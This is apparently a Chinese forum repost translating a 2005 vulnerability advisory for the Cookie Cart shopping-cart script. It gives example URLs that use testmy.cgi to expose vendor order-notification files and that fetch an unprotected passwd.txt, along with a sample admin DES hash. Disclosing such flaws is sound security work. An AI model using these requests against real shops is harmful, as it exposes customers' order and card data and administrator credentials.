[翻译]Cookie Cart网络电子商务程序存在多处漏洞
资料翻译:fpx[BCT]翻译网站:Bug.Center.Team [url]http://www.cnbct.org[/url]
名称: Cookie Cart 存在多处漏洞
厂商地址: http:// [url]www.metromkt.net/ccart[/url]
漏洞发现: SoulBlack - Security Research -
引用:http:// soulblack.com.ar
曰期: 21/05/2005
危害程度: 中等。 远程攻击者可以获得信用卡等等一些数据。
受影响版本: 不知道
============================================================
* 摘要 *
Cookie Cart Shopping是一个简单的电子商务程序。
-------------------------------------------------------------
* 漏洞描述 *
远程攻击者能获得管理密码和一些重要的数据
-------------------------------------------------------------
* 漏洞一*
通过testmy.cgi 和 testmy.pl"能拿到“ Order Notification"数据
如:[url]http://www.vulnerable.com/cart/cgi/testmy.cgi?testmycgi=/cart/cgi/testmy.cgi&path=/cart/dbase_ven/&run=yes[/url]
[url]http://www.vulnerable.com/cart/dbase_ven/[/url][vendor_#number-notification.txt]
实例:
http:// [url]www.vulnerable.com/cart/dbase_ven/vendor_10112088.txt[/url]
* 漏洞二*
读取密码文件 (DES 密码技术)
http:// [url]www.vulnerable.com/cart/data/passwd.txt[/url]
实例:
admin:aeczIj3e6GLso
-------------------------------------------------------------
* 修补 *
使用.htaccess 或联络厂商。
-------------------------------------------------------------
* 叁考 *
http:// [url]www.soulblack.com.ar/po/papers/cookiec_advisory.txt[/url]
××××××××××××××××××××××××××××××××××××××××××××××
很久没有发帖子,也很久没有发翻译资料了,BCT的翻译最近才重新重组了!
页:
[1]